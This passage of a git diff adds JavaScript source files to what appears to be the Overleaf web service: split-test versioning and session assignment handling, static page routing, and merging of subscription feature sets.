RELEASE_PHASE) { + throw new OError( + `Split test with ID '${name}' is already in the release phase` + ) + } + for (const variant of lastVersionCopy.variants) { + variant.rolloutPercent = 0 + variant.rolloutStripes = [] + } + lastVersionCopy.author = userId + lastVersionCopy.comment = comment + lastVersionCopy.createdAt = new Date() + splitTest.versions.push(lastVersionCopy) + return _saveSplitTest(splitTest) +} + +async function revertToPreviousVersion( + { name, versionNumber, comment }, + userId +) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError( + `Cannot revert split test with ID '${name}' to previous version: not found` + ) + } + if (splitTest.archived) { + throw new OError( + 'Cannot revert an archived split test to previous version', + { + name, + } + ) + } + if (splitTest.versions.length <= 1) { + throw new OError( + `Cannot revert split test with ID '${name}' to previous version: split test must have at least 2 versions` + ) + } + const previousVersion = SplitTestUtils.getVersion(splitTest, versionNumber) + if (!previousVersion) { + throw new OError( + `Cannot revert split test with ID '${name}' to version number ${versionNumber}: version not found` + ) + } + const lastVersion = SplitTestUtils.getCurrentVersion(splitTest) + if ( + lastVersion.phase === RELEASE_PHASE && + previousVersion.phase !== RELEASE_PHASE + ) { + splitTest.forbidReleasePhase = true + } + const previousVersionCopy = previousVersion.toObject() + previousVersionCopy.versionNumber = lastVersion.versionNumber + 1 + previousVersionCopy.createdAt = new Date() + previousVersionCopy.author = userId + previousVersionCopy.comment = comment + splitTest.versions.push(previousVersionCopy) + return _saveSplitTest(splitTest) +} + +async function archive(name, userId) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot archive split test with ID '${name}': not found`) + } + if (splitTest.archived) { + throw new OError(`Split test with ID '${name}' is already archived`) + } + splitTest.archived = true + splitTest.archivedAt = new Date() + splitTest.archivedBy = userId + return _saveSplitTest(splitTest) +} + +async function clearCache() { + await CacheFlow.reset('split-test') +} + +function _checkNewVariantsConfiguration( + variants, + newVariantsConfiguration, + analyticsEnabled +) { + if (newVariantsConfiguration?.length > 1 && !analyticsEnabled) { + throw new OError(`Gradual rollouts can only have a single variant`) + } + + const totalRolloutPercentage = _getTotalRolloutPercentage( + newVariantsConfiguration + ) + if (totalRolloutPercentage > 100) { + throw new OError(`Total variants rollout percentage cannot exceed 100`) + } + for (const variant of variants) { + const newVariantConfiguration = _.find(newVariantsConfiguration, { + name: variant.name, + }) + if (!newVariantConfiguration) { + throw new OError( + `Variant defined in previous version as ${JSON.stringify( + variant + )} cannot be removed in new configuration: either set it inactive or create a new split test` + ) + } + if (newVariantConfiguration.rolloutPercent < variant.rolloutPercent) { + throw new OError( + `Rollout percentage for variant defined in previous version as ${JSON.stringify( + variant + )} cannot be decreased: revert to a previous configuration instead` + ) + } + } +} + +function _updateVariantsWithNewConfiguration( + variants, + newVariantsConfiguration +) { + let totalRolloutPercentage = _getTotalRolloutPercentage(variants) + const variantsCopy = _.clone(variants) + for (const newVariantConfig of newVariantsConfiguration) { + if (newVariantConfig.rolloutPercent === 0) { + continue + } + const variant = _.find(variantsCopy, { name: newVariantConfig.name }) + if (!variant) { + variantsCopy.push({ + name: newVariantConfig.name, + rolloutPercent: newVariantConfig.rolloutPercent, + rolloutStripes: [ + { + start: totalRolloutPercentage, + end: totalRolloutPercentage + newVariantConfig.rolloutPercent, + }, + ], + }) + totalRolloutPercentage += newVariantConfig.rolloutPercent + } else if (variant.rolloutPercent < newVariantConfig.rolloutPercent) { + const newStripeSize = + newVariantConfig.rolloutPercent - variant.rolloutPercent + variant.rolloutPercent = newVariantConfig.rolloutPercent + variant.rolloutStripes.push({ + start: totalRolloutPercentage, + end: totalRolloutPercentage + newStripeSize, + }) + totalRolloutPercentage += newStripeSize + } + } + return variantsCopy +} + +function _getTotalRolloutPercentage(variants) { + return _.sumBy(variants, 'rolloutPercent') +} + +async function _saveSplitTest(splitTest) { + try { + const savedSplitTest = await splitTest.save() + await savedSplitTest.populate('archivedBy', [ + 'email', + 'first_name', + 'last_name', + ]) + await savedSplitTest.populate('versions.author', [ + 'email', + 'first_name', + 'last_name', + ]) + return savedSplitTest.toObject() + } catch (error) { + throw OError.tag(error, 'Failed to save split test', { + splitTest: JSON.stringify(splitTest), + }) + } +} + +/* + * As this is only used for utility in local dev environment, we should make sure this isn't run in + * any other deployment environment. + */ +function _checkEnvIsSafe(operation) { + if (process.env.NODE_ENV !== 'development') { + throw new OError( + `Attempted to ${operation} all feature flags outside of local env` + ) + } +} + +async function _deleteSplitTests() { + _checkEnvIsSafe('delete') + let deleted + + try { + deleted = await SplitTest.deleteMany({}).exec() + } catch (error) { + throw new OError('Failed to delete all split tests') + } + + if (!deleted.acknowledged) { + throw new OError('Error deleting split tests, split tests have not updated') + } +} + +function _mergeFlags(incomingTests, baseTests) { + // copy all base versions + const mergedSet = baseTests.map(test => test) + for (const inTest of incomingTests) { + // since name is a unique key, we can use it to compare + const newFeatureFlag = !mergedSet.some(bTest => bTest.name === inTest.name) + // only add new feature flags, instead of overwriting ones in baseTests, meaning baseTests take precendence + if (newFeatureFlag) { + mergedSet.push(inTest) + } + } + return mergedSet +} + +module.exports = { + getSplitTest, + getSplitTests, + getRuntimeTests, + createSplitTest, + updateSplitTestConfig, + updateSplitTestInfo, + updateSplitTestBadgeInfo, + switchToNextPhase, + revertToPreviousVersion, + archive, + replaceSplitTests, + mergeSplitTests, + clearCache, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js b/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js new file mode 100644 index 0000000..2e8e1ff --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js @@ -0,0 +1,49 @@ +const SplitTestHandler = require('./SplitTestHandler') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const Errors = require('../Errors/Errors') + +function loadAssignmentsInLocals(splitTestNames) { + return async function (req, res, next) { + try { + for (const splitTestName of splitTestNames) { + await SplitTestHandler.promises.getAssignment(req, res, splitTestName) + } + } catch (error) { + logger.error( + { err: error, splitTestNames }, + 'Failed to load split test assignments in express locals in middleware' + ) + } + next() + } +} + +function ensureSplitTestEnabledForUser( + splitTestName, + enabledVariant = 'enabled' +) { + return expressify(async function (req, res, next) { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + splitTestName + ) + if (variant !== enabledVariant) { + throw new Errors.ForbiddenError({ + message: 'missing split test access', + info: { + splitTestName, + variant, + enabledVariant, + }, + }) + } + next() + }) +} + +module.exports = { + loadAssignmentsInLocals, + ensureSplitTestEnabledForUser, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js b/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js new file mode 100644 index 0000000..52d1352 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js @@ -0,0 +1,258 @@ +const { callbackify } = require('util') +const _ = require('lodash') +const { ObjectId } = require('mongodb-legacy') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const SessionManager = require('../Authentication/SessionManager') +const SplitTestCache = require('./SplitTestCache') +const SplitTestUtils = require('./SplitTestUtils') +const SplitTestUserGetter = require('./SplitTestUserGetter') + +const CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER = null +const TOKEN_SEP = ';' +// this is safe to use as a separator adjacent to a base64 string because Mongo object IDs +// do not generate any padding when converted (24 hex digits = 12 bytes => multiple of 6), +// thus do not contain any trailing `=` +const KEY_VALUE_SEP = '=' +const ID_VERSION_SEP = '_' +const VARIANT_DATE_SEP = ':' + +async function getAssignments(session) { + await _convertAnonymousAssignmentsIfNeeded(session) + + if (!session.sta) { + return undefined + } + + const assignments = {} + const tokens = session.sta.split(TOKEN_SEP) + const splitTests = Array.from((await SplitTestCache.get('')).values()) + for (const token of tokens) { + try { + if (!token.length) { + continue + } + const [splitTestNameVersion, info] = token.split(KEY_VALUE_SEP) + const [splitTestId64, versionStr] = + splitTestNameVersion.split(ID_VERSION_SEP) + + const splitTest = splitTests.find( + test => splitTestId64 === _convertIdToBase64(test._id) + ) + if (!splitTest) { + continue + } + + const splitTestName = splitTest.name + const versionNumber = parseInt(versionStr) + const [variantChar, timestampStr36] = info.split(VARIANT_DATE_SEP) + const assignedAt = new Date(parseInt(timestampStr36, 36) * 1000) + let variantName + if (variantChar === 'd') { + variantName = 'default' + } else { + const variantIndex = parseInt(variantChar) + variantName = + SplitTestUtils.getCurrentVersion(splitTest).variants[variantIndex] + .name + } + + if (!assignments[splitTestName]) { + assignments[splitTestName] = [] + } + if ( + !_.find(assignments[splitTestName], { + versionNumber, + variantName, + }) + ) + assignments[splitTestName].push({ + versionNumber, + variantName, + phase: 'release', // anonymous users can only be exposed to tests in release phase + assignedAt, + }) + } catch (error) { + logger.error( + { err: error, token }, + 'Failed to resolve cached anonymous split test assignments from session' + ) + } + } + + return assignments +} + +async function appendAssignment(session, assignment) { + await _convertAnonymousAssignmentsIfNeeded(session) + + if ( + !_hasExistingAssignment( + session, + assignment.splitTestId, + assignment.versionNumber + ) + ) { + if (!session.sta) { + session.sta = '' + } + const splitTests = await SplitTestCache.get('') + const splitTest = splitTests.get(assignment.splitTestName) + const assignmentString = _buildAssignmentString(splitTest, assignment) + const separator = session.sta.length > 0 ? TOKEN_SEP : '' + session.sta += `${separator}${assignmentString}` + } +} + +function getCachedVariant(session, splitTestName, currentVersion) { + if (!session.cachedSplitTestAssignments) { + session.cachedSplitTestAssignments = {} + } + const cacheKey = `${splitTestName}-${currentVersion.versionNumber}` + return session.cachedSplitTestAssignments[cacheKey] +} + +function setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName, + activeForUser, +}) { + if (!session.cachedSplitTestAssignments) { + session.cachedSplitTestAssignments = {} + } + + // clean up previous entries from this split test + for (const cacheKey of Object.keys(session.cachedSplitTestAssignments)) { + // drop '-versionNumber' + const name = cacheKey.split('-').slice(0, -1).join('-') + if (name === splitTestName) { + delete session.cachedSplitTestAssignments[cacheKey] + } + } + + const cacheKey = `${splitTestName}-${currentVersion.versionNumber}` + if (activeForUser) { + session.cachedSplitTestAssignments[cacheKey] = selectedVariantName + } else { + session.cachedSplitTestAssignments[cacheKey] = + CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER + } +} + +/** + * @param {import('express').Request} req + * @param {Object|null} user optional, prefetched user with alphaProgram and betaProgram field + * @return {Promise<void>} + */ +async function sessionMaintenance(req, user) { + const session = req.session + const sessionUser = SessionManager.getSessionUser(session) + + Metrics.inc('split_test_session_maintenance', 1, { status: 'start' }) + if (sessionUser) { + user = user || (await SplitTestUserGetter.promises.getUser(sessionUser._id)) + if ( + Boolean(sessionUser.alphaProgram) !== Boolean(user.alphaProgram) || + Boolean(sessionUser.betaProgram) !== Boolean(user.betaProgram) + ) { + Metrics.inc('split_test_session_maintenance', 1, { + status: 'program-change', + }) + sessionUser.alphaProgram = user.alphaProgram || undefined // only store if set + sessionUser.betaProgram = user.betaProgram || undefined // only store if set + session.cachedSplitTestAssignments = {} + } + } + + // TODO: After changing the split test config fetching: remove split test assignments for archived split tests +} + +function collectSessionStats(session) { + if (session.cachedSplitTestAssignments) { + Metrics.summary( + 'split_test_session_cache_count', + Object.keys(session.cachedSplitTestAssignments).length + ) + Metrics.summary( + 'split_test_session_cache_size', + JSON.stringify(session.cachedSplitTestAssignments).length + ) + } + if (session.sta) { + Metrics.summary( + 'split_test_session_storage_count', + (session.sta || '').split(';').length + ) + Metrics.summary( + 'split_test_session_storage_size', + (session.sta || '').length + ) + } +} + +async function _convertAnonymousAssignmentsIfNeeded(session) { + if (session.splitTests) { + const splitTests = await SplitTestCache.get('') + if (!session.sta) { + session.sta = '' + } + for (const [splitTestName, assignments] of Object.entries( + session.splitTests || {} + )) { + const splitTest = splitTests.get(splitTestName) + for (const assignment of assignments) { + const assignmentString = _buildAssignmentString(splitTest, assignment) + const separator = session.sta.length > 0 ? TOKEN_SEP : '' + if (!session.sta.includes(assignmentString)) { + session.sta += `${separator}${assignmentString}` + } + } + } + delete session.splitTests + } +} + +function _hasExistingAssignment(session, splitTest, versionNumber) { + if (!session.sta) { + return false + } + const index = session.sta.indexOf( + `${_convertIdToBase64(splitTest._id)}${ID_VERSION_SEP}${versionNumber}=` + ) + return index >= 0 +} + +function _buildAssignmentString(splitTest, assignment) { + const { versionNumber, variantName, assignedAt } = assignment + const variants = SplitTestUtils.getCurrentVersion(splitTest).variants + const splitTestId = _convertIdToBase64(splitTest._id) + const variantChar = + variantName === 'default' + ? 'd' + : _.findIndex(variants, { name: variantName }) + const timestamp = Math.floor(new Date(assignedAt).getTime() / 1000).toString( + 36 + ) + return `${splitTestId}${ID_VERSION_SEP}${versionNumber}${KEY_VALUE_SEP}${variantChar}${VARIANT_DATE_SEP}${timestamp}` +} + +function _convertIdToBase64(id) { + return new ObjectId(id).toString('base64') +} + +module.exports = { + getAssignments: callbackify(getAssignments), + appendAssignment: callbackify(appendAssignment), + getCachedVariant, + setVariantInCache, + sessionMaintenance: callbackify(sessionMaintenance), + collectSessionStats, + CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER, + promises: { + getAssignments, + appendAssignment, + sessionMaintenance, + }, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js b/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js new file mode 100644 index 0000000..cf6503c --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js @@ -0,0 +1,30 @@ +const { callbackify } = require('util') +const Metrics = require('@overleaf/metrics') +const UserGetter = require('../User/UserGetter') + +async function getUser(id, splitTestName) { + const projection = { + analyticsId: 1, + alphaProgram: 1, + betaProgram: 1, + } + if (splitTestName) { + projection[`splitTests.${splitTestName}`] = 1 + } else { + projection.splitTests = 1 + } + const user = await UserGetter.promises.getUser(id, projection) + Metrics.histogram( + 'split_test_get_user_from_mongo_size', + JSON.stringify(user).length, + [0, 100, 500, 1000, 2000, 5000, 10000, 15000, 20000, 50000, 100000] + ) + return user +} + +module.exports = { + getUser: callbackify(getUser), + promises: { + getUser, + }, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestUtils.js b/services/web/app/src/Features/SplitTests/SplitTestUtils.js new file mode 100644 index 0000000..ef26dbe --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestUtils.js @@ -0,0 +1,20 @@ +const _ = require('lodash') + +function getCurrentVersion(splitTest) { + if (splitTest?.versions?.length > 0) { + return _.maxBy(splitTest.versions, 'versionNumber') + } else { + return undefined + } +} + +function getVersion(splitTest, versionNumber) { + return _.find(splitTest.versions || [], { + versionNumber, + }) +} + +module.exports = { + getCurrentVersion, + getVersion, +} diff --git a/services/web/app/src/Features/SplitTests/types.d.ts b/services/web/app/src/Features/SplitTests/types.d.ts new file mode 100644 index 0000000..47e04de --- /dev/null +++ b/services/web/app/src/Features/SplitTests/types.d.ts @@ -0,0 +1,12 @@ +type AssignmentMetadata = { + phase?: 'alpha' | 'beta' | 'release' + versionNumber?: boolean + // only returned when `analyticsEnabled` is set to `true` on the current version + // of the split test, and an assignment is queried for the user for the first time + isFirstNonDefaultAssignment?: boolean +} + +export type Assignment = { + variant: string + metadata: AssignmentMetadata +} diff --git a/services/web/app/src/Features/StaticPages/HomeController.mjs b/services/web/app/src/Features/StaticPages/HomeController.mjs new file mode 100644 index 0000000..cc73612 --- /dev/null +++ b/services/web/app/src/Features/StaticPages/HomeController.mjs @@ -0,0 +1,63 @@ +import Features from '../../infrastructure/Features.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' +import Path from 'node:path' +import fs from 'node:fs' +import ErrorController from '../Errors/ErrorController.js' +import SessionManager from '../Authentication/SessionManager.js' +import { expressify } from '@overleaf/promise-utils' +import logger from '@overleaf/logger' + +const __dirname = new URL('.', import.meta.url).pathname + +const homepageExists = fs.existsSync( + Path.join(__dirname, '/../../../views/external/home/index.pug') +) + +async function index(req, res) { + if (SessionManager.isUserLoggedIn(req.session)) { + if (req.query.scribtex_path != null) { + res.redirect(`/project?scribtex_path=${req.query.scribtex_path}`) + } else { + res.redirect('/project') + } + } else { + await home(req, res) + } +} + +async function home(req, res) { + if (Features.hasFeature('homepage') && homepageExists) { + AnalyticsManager.recordEventForSession(req.session, 'home-page-view', { + page: req.path, + }) + + res.render('external/home/index') + } else { + res.redirect('/login') + } +} + +function externalPage(page, title) { + const middleware = async function (req, res, next) { + const path = Path.join(__dirname, `/../../../views/external/${page}.pug`) + try { + const stats = await fs.promises.stat(path) + if (!stats.isFile()) { + logger.error({ stats, path }, 'Error serving external page') + ErrorController.notFound(req, res, next) + } else { + res.render(`external/${page}.pug`, { title }) + } + } catch (error) { + logger.error({ path }, 'Error serving external page: file not found') + ErrorController.notFound(req, res, next) + } + } + return expressify(middleware) +} + +export default { + index: expressify(index), + home: expressify(home), + externalPage, +} diff --git a/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs b/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs new file mode 100644 index 0000000..e9fa268 --- /dev/null +++ b/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs @@ -0,0 +1,32 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import _ from 'lodash' + +const extensionsToProxy = [ + '.png', + '.xml', + '.jpeg', + '.json', + '.zip', + '.eps', + '.gif', + '.jpg', +] + +export default { + shouldProxy(url) { + const shouldProxy = _.find( + extensionsToProxy, + extension => url.indexOf(extension) !== -1 + ) + return shouldProxy + }, +} diff --git a/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs b/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs new file mode 100644 index 0000000..b81e25c --- /dev/null +++ b/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs @@ -0,0 +1,33 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import HomeController from './HomeController.mjs' + +import UniversityController from './UniversityController.mjs' + +export default { + apply(webRouter) { + webRouter.get('/', HomeController.index) + webRouter.get('/home', HomeController.home) + + webRouter.get( + '/planned_maintenance', + HomeController.externalPage('planned_maintenance', 'Planned Maintenance') + ) + + webRouter.get( + '/track-changes-and-comments-in-latex', + HomeController.externalPage('review-features-page', 'Review features') + ) + + webRouter.get('/university', UniversityController.getIndexPage) + return webRouter.get('/university/*', UniversityController.getPage) + }, +} diff --git a/services/web/app/src/Features/StaticPages/UniversityController.mjs b/services/web/app/src/Features/StaticPages/UniversityController.mjs new file mode 100644 index 0000000..35fec9f --- /dev/null +++ b/services/web/app/src/Features/StaticPages/UniversityController.mjs @@ -0,0 +1,24 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let UniversityController + +export default UniversityController = { + getPage(req, res, next) { + const url = + req.url != null ? req.url.toLowerCase().replace('.html', '') : undefined + return res.redirect(`/i${url}`) + }, + + getIndexPage(req, res) { + return res.redirect('/i/university') + }, +} diff --git a/services/web/app/src/Features/Subscription/Errors.js b/services/web/app/src/Features/Subscription/Errors.js new file mode 100644 index 0000000..53ecf7b --- /dev/null +++ b/services/web/app/src/Features/Subscription/Errors.js @@ -0,0 +1,36 @@ +const Errors = require('../Errors/Errors') +const OError = require('@overleaf/o-error') + +class RecurlyTransactionError extends Errors.BackwardCompatibleError { + constructor(options) { + super({ + message: 'Unknown transaction error', + ...options, + }) + } +} + +class DuplicateAddOnError extends OError {} + +class AddOnNotPresentError extends OError {} + +class MissingBillingInfoError extends OError {} + +class ManuallyCollectedError extends OError {} + +class PendingChangeError extends OError {} + +class InactiveError extends OError {} + +class SubtotalLimitExceededError extends OError {} + +module.exports = { + RecurlyTransactionError, + DuplicateAddOnError, + AddOnNotPresentError, + MissingBillingInfoError, + ManuallyCollectedError, + PendingChangeError, + InactiveError, + SubtotalLimitExceededError, +} diff --git a/services/web/app/src/Features/Subscription/FeaturesHelper.js b/services/web/app/src/Features/Subscription/FeaturesHelper.js new file mode 100644 index 0000000..b948815 --- /dev/null +++ b/services/web/app/src/Features/Subscription/FeaturesHelper.js @@ -0,0 +1,122 @@ +const _ = require('lodash') +const Settings = require('@overleaf/settings') + +/** + * merges an array of feature sets to produce a final feature set + */ +function computeFeatureSet(featureSets) { + return featureSets.reduce(mergeFeatures, {}) +} + +/** + * Merge feature sets coming from different sources + */ +function mergeFeatures(featuresA, featuresB) { + const features = Object.assign({}, featuresA) + for (const key in featuresB) { + // Special merging logic for non-boolean features + if (key === 'compileGroup') { + if ( + features.compileGroup === 'priority' || + featuresB.compileGroup === 'priority' + ) { + features.compileGroup = 'priority' + } else { + features.compileGroup = 'standard' + } + } else if (key === 'collaborators') { + if (features.collaborators === -1 || featuresB.collaborators === -1) { + features.collaborators = -1 + } else { + features.collaborators = Math.max( + features.collaborators || 0, + featuresB.collaborators || 0 + ) + } + } else if (key === 'compileTimeout') { + features.compileTimeout = Math.max( + features.compileTimeout || 0, + featuresB.compileTimeout || 0 + ) + } else { + // Boolean keys, true is better + features[key] = features[key] || featuresB[key] + } + } + if (features.mendeley && features.referencesSearch && features.zotero) { + // Back fill legacy feature flag for isFeatureSetBetter to work properly + // with professional feature overrides. + features.references = true + } + return features +} + +/** + * Returns whether `featuresA` is a better feature set than `featuresB` + */ +function isFeatureSetBetter(featuresA, featuresB) { + const mergedFeatures = mergeFeatures(featuresA, featuresB) + return _.isEqual(featuresA, mergedFeatures) +} + +/** + * Return what's missing from `currentFeatures` to equal `expectedFeatures` + */ +function compareFeatures(currentFeatures, expectedFeatures) { + currentFeatures = _.clone(currentFeatures) + expectedFeatures = _.clone(expectedFeatures) + if (_.isEqual(currentFeatures, expectedFeatures)) { + return {} + } + + const mismatchReasons = {} + const featureKeys = [ + ...new Set([ + ...Object.keys(currentFeatures), + ...Object.keys(expectedFeatures), + ]), + ] + featureKeys.sort().forEach(key => { + if (expectedFeatures[key] !== currentFeatures[key]) { + mismatchReasons[key] = expectedFeatures[key] + } + }) + + if (mismatchReasons.compileTimeout) { + // store the compile timeout difference instead of the new compile timeout + mismatchReasons.compileTimeout = + expectedFeatures.compileTimeout - currentFeatures.compileTimeout + } + + if (mismatchReasons.collaborators) { + // store the collaborators difference instead of the new number only + // replace -1 by 100 to make it clearer + if (expectedFeatures.collaborators === -1) { + expectedFeatures.collaborators = 100 + } + if (currentFeatures.collaborators === -1) { + currentFeatures.collaborators = 100 + } + mismatchReasons.collaborators = + expectedFeatures.collaborators - currentFeatures.collaborators + } + + return mismatchReasons +} + +function getMatchedFeatureSet(features) { + for (const [name, featureSet] of Object.entries(Settings.features)) { + if (_.isEqual(features, featureSet)) { + return name + } + } + return 'mixed' +} + +module.exports = { + mergeFeatures, + computeFeatureSet, + isFeatureSetBetter, + compareFeatures, + getMatchedFeatureSet, +} diff --git a/services/web/app/src/Features/Subscription/FeaturesUpdater.js b/services/web/app/src/Features/Subscription/FeaturesUpdater.js new file mode 100644 index 0000000..eff88d4 --- /dev/null +++ b/services/web/app/src/Features/Subscription/FeaturesUpdater.js @@ -0,0 +1,228 @@ +const _ = require('lodash') +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const PlansLocator = require('./PlansLocator') +const SubscriptionLocator = require('./SubscriptionLocator') +const UserFeaturesUpdater = require('./UserFeaturesUpdater') +const FeaturesHelper = require('./FeaturesHelper') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const ReferalFeatures = require('../Referal/ReferalFeatures') +const V1SubscriptionManager = require('./V1SubscriptionManager') +const InstitutionsFeatures = require('../Institutions/InstitutionsFeatures') +const UserGetter = require('../User/UserGetter') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const Queues = require('../../infrastructure/Queues') +const Modules = require('../../infrastructure/Modules') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') + +/** + * Enqueue a job for refreshing features for the given user + */ +async function scheduleRefreshFeatures(userId, reason) { + const queue = Queues.getQueue('refresh-features') + await queue.add({ userId, reason }) +} + +/* Check if user features refresh if needed, based on the global featuresEpoch setting */ +function featuresEpochIsCurrent(user) { + return Settings.featuresEpoch + ? user.featuresEpoch === Settings.featuresEpoch + : true +} + +/** + * Refresh features for the given user + */ +async function refreshFeatures(userId, reason) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + features: 1, + }) + const oldFeatures = _.clone(user.features) + const features = await computeFeatures(userId) + logger.debug({ userId, features }, 'updating user features') + + const matchedFeatureSet = FeaturesHelper.getMatchedFeatureSet(features) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'feature-set', + matchedFeatureSet + ) + + const { features: newFeatures, featuresChanged } = + await UserFeaturesUpdater.promises.updateFeatures(userId, features) + if (oldFeatures.dropbox === true && features.dropbox === false) { + logger.debug({ userId }, '[FeaturesUpdater] must unlink dropbox') + try { + await Modules.promises.hooks.fire('removeDropbox', userId, reason) + } catch (err) { + logger.error({ err, userId }, 'removeDropbox hook failed') + } + } + + if (oldFeatures.github === true && features.github === false) { + logger.debug({ userId }, '[FeaturesUpdater] must unlink github') + try { + await Modules.promises.hooks.fire('removeGithub', userId, reason) + } catch (err) { + logger.error({ err, userId }, 'removeGithub hook failed') + } + } + + return { features: newFeatures, featuresChanged } +} + +/** + * Return the features that the given user should have. + */ +async function computeFeatures(userId) { + const individualFeatures = await _getIndividualFeatures(userId) + const groupFeatureSets = await _getGroupFeatureSets(userId) + const institutionFeatures = + await InstitutionsFeatures.promises.getInstitutionsFeatures(userId) + const user = await UserGetter.promises.getUser(userId, { + featuresOverrides: 1, + 'overleaf.id': 1, + }) + const v1Features = await _getV1Features(user) + const bonusFeatures = await ReferalFeatures.promises.getBonusFeatures(userId) + const featuresOverrides = await _getFeaturesOverrides(user) + logger.debug( + { + userId, + individualFeatures, + groupFeatureSets, + institutionFeatures, + v1Features, + bonusFeatures, + featuresOverrides, + }, + 'merging user features' + ) + const featureSets = groupFeatureSets.concat([ + individualFeatures, + institutionFeatures, + v1Features, + bonusFeatures, + featuresOverrides, + ]) + return _.reduce( + featureSets, + FeaturesHelper.mergeFeatures, + Settings.defaultFeatures + ) +} + +async function _getIndividualFeatures(userId) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + if (subscription == null || subscription?.recurlyStatus?.state === 'paused') { + return {} + } + + const featureSets = [] + + // The plan doesn't apply to the group admin when the subscription + // is a group subscription + if (!subscription.groupPlan) { + featureSets.push(_subscriptionToFeatures(subscription)) + } + + featureSets.push(_aiAddOnFeatures(subscription)) + return _.reduce(featureSets, FeaturesHelper.mergeFeatures, {}) +} + +async function _getGroupFeatureSets(userId) { + const subs = + await SubscriptionLocator.promises.getGroupSubscriptionsMemberOf(userId) + return (subs || []).map(_subscriptionToFeatures) +} + +async function _getFeaturesOverrides(user) { + if (!user || !user.featuresOverrides || user.featuresOverrides.length === 0) { + return {} + } + const activeFeaturesOverrides = [] + for (const featuresOverride of user.featuresOverrides) { + if ( + !featuresOverride.expiresAt || + featuresOverride.expiresAt > new Date() + ) { + activeFeaturesOverrides.push(featuresOverride.features) + } + } + return _.reduce(activeFeaturesOverrides, FeaturesHelper.mergeFeatures, {}) +} + +async function _getV1Features(user) { + const v1Id = user?.overleaf?.id + return V1SubscriptionManager.getGrandfatheredFeaturesForV1User(v1Id) || {} +} + +function _subscriptionToFeatures(subscription) { + if (!subscription?.planCode) { + return {} + } + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + if (!plan) { + return {} + } else { + return plan.features + } +} + +function _aiAddOnFeatures(subscription) { + if (subscription?.addOns?.some(addOn => addOn.addOnCode === AI_ADD_ON_CODE)) { + return { aiErrorAssistant: true } + } else { + return {} + } +} + +async function doSyncFromV1(v1UserId) { + logger.debug({ v1UserId }, '[AccountSync] starting account sync') + const user = await UserGetter.promises.getUser( + { 'overleaf.id': v1UserId }, + { _id: 1 } + ) + if (user == null) { + logger.warn({ v1UserId }, '[AccountSync] no user found for v1 id') + return + } + logger.debug( + { v1UserId, userId: user._id }, + '[AccountSync] updating user subscription and features' + ) + return refreshFeatures(user._id, 'sync-v1') +} + +async function hasFeaturesViaWritefull(userId) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + writefull: 1, + }) + return Boolean(user?.writefull?.isPremium) +} + +module.exports = { + featuresEpochIsCurrent, + computeFeatures: callbackify(computeFeatures), + refreshFeatures: callbackifyMultiResult(refreshFeatures, [ + 'features', + 'featuresChanged', + ]), + doSyncFromV1: callbackifyMultiResult(doSyncFromV1, [ + 'features', + 'featuresChanged', + ]), + scheduleRefreshFeatures: callbackify(scheduleRefreshFeatures), + hasFeaturesViaWritefull: callbackify(hasFeaturesViaWritefull), + promises: { + computeFeatures, + refreshFeatures, + scheduleRefreshFeatures, + doSyncFromV1, + hasFeaturesViaWritefull, + }, +} diff --git a/services/web/app/src/Features/Subscription/GroupPlansData.js b/services/web/app/src/Features/Subscription/GroupPlansData.js new file mode 100644 index 0000000..971a01f --- /dev/null +++ b/services/web/app/src/Features/Subscription/GroupPlansData.js @@ -0,0 +1,69 @@ +const Settings = require('@overleaf/settings') +const fs = require('fs') +const Path = require('path') + +// The groups.json file encodes the 